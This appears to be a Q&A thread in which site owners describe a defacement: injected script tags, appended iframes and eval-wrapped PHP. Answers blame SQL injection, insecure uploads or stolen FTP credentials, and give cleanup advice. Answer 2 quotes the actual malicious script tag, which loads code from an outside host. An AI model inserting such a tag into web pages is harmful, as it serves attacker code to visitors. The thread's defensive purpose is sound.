I'm finding rogue code included in my HTML page head -- how did it get there and how do I stop it?

Question

My major weakness is securing my sites -- I know, a bad weakness.

I have a site now that when I view the source in Firebug, I'm seeing all kinds of scripts with the src of http://mylocksmithusa.com/sitebuilder/acura2002.php -- but they're not in my files that I can find. How did they get there, how can I find them, how can I remove them, and how do I stop them from happening again?

Similarly, another site of mine keeps having its index.php file rewritten, mostly just having some of the code erased and then a bunch of <iframe>jareqjj93u8q2u35w</iframe> jibberish added to the bottom.

My FTP passwords are very secure -- should I change them and hope it stops? Or is there more to it that I just don't understand about locking down my sites from this kind of dangerous abuse?

Thanks!

Answer 1

Looks like you've been a victim of a SQL injection attack or trusting unsanitised input from your query strings.

If files are being physically appended to there's also the chance that you've got some code on your site that allows file uploads without checking a user is authenticated and/or doesn't check the type of file being uploaded. This would allow a miscreant to upload a script to modify every file on your site and add these links.

Answer 2

My site got was attacked the same way too <script src=http://mylocksmithusa.com/sitebuilder/acura2002.php></script>. After I checked it, apparently almost all of my .js file was appended with document.write([the script above]) on the last line. Additionally, almost all .html file was appended with an iframe just after the <body> tag (and then few last lines in the files were removed), and several of .php files in my site got appended with eval([super long codes]) on the beginning of the file.

After cleaning up the files, yesterday I changed my ftp password, and today the site isn't hacked anymore (before, every few hours the files will be changed). So I suspect some worm or something already got access to your ftp. What you can do is change the ftp password, take your site offline for a while, until you cleaned up the files.

Answer 3

You are asking us how someone popped your site and the only honest answer is "we don't know".

Check ftp and other services, check your code for where you get input (cookie, querystring, post params etc) but the most likely is you installed an old known vulnerable version of wordpress or some webapp and a roving worm found it and exploited it.

Answer 4

A common source of the iframe-addition attacks is infected client computers leaking their FTP passwords. So you need to check both the server and any clients you have used to connect to it for malware, before changing the passwords. (And preferably changing to SFTP; nobody should still be using FTP in 2009.)

Don't just assume your machines aren't infected because you're running anti-virus software. Today's AVs are pathetically, hopelessly behind the malware writers. Take multiple opinions and if an AV finds anything don't trust it to fix the problem, because chances are it will fail, potentially leaving infections present. Instead reinstall the OS.

In the first case with the HTML seemingly added at serve-time, the server itself may be infected and need reinstalling. Either way, get them off the web until you're sure they're cleaned.